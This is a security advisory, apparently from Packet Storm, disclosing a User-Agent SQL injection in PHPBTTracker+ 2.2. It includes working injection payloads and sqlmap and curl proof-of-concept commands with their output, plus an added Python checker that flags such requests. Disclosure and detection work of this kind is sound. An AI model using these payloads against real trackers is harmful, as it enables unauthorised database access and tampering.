PHPBTTracker+ 2.2 SQL Injection

Published: 03 Jun 2014 | Reported by: BackBox Team | Type: packetstorm | Source: packetstormsecurity.com

PHPBTTracker+ 2.2 SQL Injection vulnerability in the User-Agent HTTP header

# Exploit Title: PHPBTTracker+ 2.2 SQL Injection  
# Date: May 13th, 2014  
# Exploit Author: BackBox Team <[email protected]>  
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/  
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/  
# Version: PHPBTTracker+ 2.2  
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0  
  
========================================================================  
  
Advisory: PHPBTTracker+ 2.2 SQL Injection  
Disclosure by: BackBox Team <[email protected]>  
Severity: High  
  
  
I. INTRODUCTION  
========================================================================  
  
SQL Injection through User-Agent.  
  
The User-Agent header identifies the client application that originated  
the request. It is used for statistics and for tracing protocol violations.  
Its first whitespace-delimited token must be the product name, optionally  
followed by a slash and a version number.  
  
Injection through the User-Agent header is a critical issue for web  
applications. In this specific case it is worth inspecting how the tracker  
handles the User-Agent header to see whether a malformed value allows SQL  
injection.  
  
Example:  
GET /tracker.php  
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa  
Host: [host]  
Accept: */*  
Accept-Encoding: gzip;q=1.0, deflate, identity  
  
  
II. BACKGROUND  
========================================================================  
BitTorrent tracker protocol is used by clients to request the IP  
addresses of other peers associated with a torrent, and to exchange the  
client's transfer statistics. Clients connect to a centralized server,  
known as a *tracker*, which stores their IP addresses and responds with  
the IP addresses of other clients (also known as *peers*). The tracker  
has no knowledge about the association of the nodes and their pieces  
(it functions only as a bridge between clients).  
  
The standard tracker protocol is based on HTTP, with request data  
encoded as query parameters (as used by HTML forms) and response data  
BEncoded.  
  
Query parameters must be encoded according to the rules for HTML form  
submissions through HTTP GET: 'reserved character' bytes are encoded in  
hexadecimal as %HH, and space is encoded as "+"; names and values are  
joined with "=" and the pairs joined with "&".  
  
The tracker's announce URL is obtained from the announce entry of the  
root dictionary of the torrent metadata file.  
  
Clients announce themselves by sending a GET request to the tracker's  
announce URL with "?" and the following parameters (encoded as above)  
appended:  
  
info_hash  
The 20 byte sha1 hash of the bencoded form of the info value from  
the metainfo file. Note that this is a substring of the metainfo  
file. Don't forget to URL-encode this.  
  
peer_id  
A string of length 20 which the downloader uses as its id. Each  
downloader generates its own id at random at the start of a new  
download. Don't forget to URL-encode this.  
  
port  
Port number that the peer is listening on. Common behavior is for a  
downloader to try to listen on port 6881 and if that port is taken  
try 6882, then 6883, etc. and give up after 6889.  
  
uploaded  
Total amount uploaded so far, represented in base ten in ASCII.  
  
downloaded  
Total amount downloaded so far, represented in base ten in ASCII.  
  
left  
Number of bytes that a specific client still has to download,  
represented in base ten in ASCII. Note that this can't be computed  
from downloaded and the file length since the client might be  
resuming an earlier download, and there is a chance that some of  
the downloaded data failed an integrity check and had to be  
re-downloaded.  
  
event  
Optional key which maps to started, completed, or stopped (or empty,  
which is the same as not being present). If not present, this is one  
of the announcements done at regular intervals. An announcement  
using started is sent when a download first begins, and one using  
completed is sent when the download is complete. No completed is  
sent if the file was complete when started. Downloaders should send  
an announcement using 'stopped' when they cease downloading,  
if they can.  
  
Example:  
http://hostname/announce  
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4  
&peer_id=  
&port=51413  
&uploaded=0  
&downloaded=0  
&left=0  
&event=started  
  
  
III. DESCRIPTION  
========================================================================  
  
To exploit the vulnerability the torrent has to be one managed by the  
tracker. First the announce GET request has to be captured and its  
"info_hash" parameter extracted; a proxy or a traffic sniffer such as  
Wireshark can help with that.  
  
Example:  
  
GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1  
User-Agent: Transmission/2.51  
Host: hostname  
Accept: */*  
Accept-Encoding: gzip;q=1.0, deflate, identity  
  
SQL commands can then be injected through the User-Agent field.  
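As an added example (not part of this advisory or of PHPBTTracker+), a small Python checker that applies the announce-request rules from Section II and the User-Agent grammar from Section I to a captured request, flagging the anomalies a tracker or a reverse proxy in front of it should reject. The sample requests are constructed from the one shown above, and the list of SQL meta-characters and keywords is a heuristic assumption, not a complete signature.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Section I grammar: the first whitespace-delimited token is the product
# name, optionally followed by "/" and a version number.
UA_PRODUCT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*(/[A-Za-z0-9._+-]+)?$")
# Heuristic (assumption): quotes, comment markers and the SQL keywords seen
# in the payloads above have no business in a BitTorrent client name.
SQL_SUSPECT = re.compile(
    r"""['"`;]|--|/\*|\b(OR|AND|SLEEP|RLIKE|SELECT|UNION|CASE)\b""", re.I)

def parse_request(raw):
    """Split a raw HTTP request into (target, {lower-cased header: value})."""
    lines = raw.strip().splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers

def check_announce(raw):
    """Return a list of findings for one announce request; [] means clean."""
    findings = []
    target, headers = parse_request(raw)
    # Keep values percent-encoded: info_hash is raw binary and a UTF-8
    # decoding pass (as parse_qs does) would silently corrupt it.
    params = dict(pair.partition("=")[::2]
                  for pair in urlsplit(target).query.split("&"))
    info_hash = unquote_to_bytes(params.get("info_hash", ""))
    if len(info_hash) != 20:  # SHA-1 of the bencoded info dict
        findings.append(f"info_hash decodes to {len(info_hash)} bytes, not 20")
    port = params.get("port", "")
    if not (port.isdigit() and 0 < int(port) < 65536):
        findings.append("port is not a valid TCP port")
    ua = headers.get("user-agent", "")
    first_token = ua.split(None, 1)[0] if ua.strip() else ""
    if not UA_PRODUCT.match(first_token):
        findings.append("User-Agent does not start with product[/version]")
    if SQL_SUSPECT.search(ua):
        findings.append("User-Agent contains SQL meta-characters or keywords")
    return findings

# Constructed sample: the announce request from Section III, once with the
# genuine Transmission User-Agent and once with the payload from Section I.
ANNOUNCE = ("GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea"
            "%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413"
            "&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1\r\n"
            "Host: hostname\r\nAccept: */*\r\nUser-Agent: ")
BENIGN = ANNOUNCE + "Transmission/2.51\r\n"
INJECTED = ANNOUNCE + "Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa\r\n"
```

Running `check_announce` over a web server's captured announce requests yields an empty list for well-formed clients and a finding for each deviation, which is what a detection rule for this issue should alert on.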
  
  
IV. PROOF OF CONCEPT  
========================================================================  
It is possible to verify the vulnerability by using, for example,  
sqlmap or curl.  
  
* Using SQLMap  
  
raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent  
  
[...]  
  
User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]  
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:  
---  
Place: User-Agent  
Parameter: User-Agent  
Type: boolean-based blind  
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)  
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW  
---  
  
* Using curl  
  
raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'  
  
[...]  
  
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e  
  
  
V. BUSINESS IMPACT  
========================================================================  
An attacker could execute arbitrary SQL queries on the vulnerable  
system. This may compromise the integrity of the database and/or expose  
sensitive information.  
  
  
VI. SYSTEMS AFFECTED  
========================================================================  
PHPBTTracker+ version 2.2 is vulnerable (probably v2.x and  
RivetTracker v1.x too).  
  
Software Link: http://phpbttrkplus.sourceforge.net/  
Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0  
  
  
VII. REFERENCES  
========================================================================  
https://wiki.theory.org/BitTorrent_Tracker_Protocol  
http://resources.infosecinstitute.com/sql-injection-http-headers  
  
  
VIII. CREDITS  
========================================================================  
The vulnerability has been discovered by BackBox Linux Team  
http://www.backbox.org  
  
  
IX. VULNERABILITY HISTORY  
========================================================================  
May 13th, 2014: Vulnerability identification  
May ??th, 2014: Vendor notification  
May ??th, 2014: Vulnerability disclosure  
  
  
X. LEGAL NOTICES  
========================================================================  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. We accept no  
responsibility for any damage caused by the use or misuse  
of this information.  
  
  
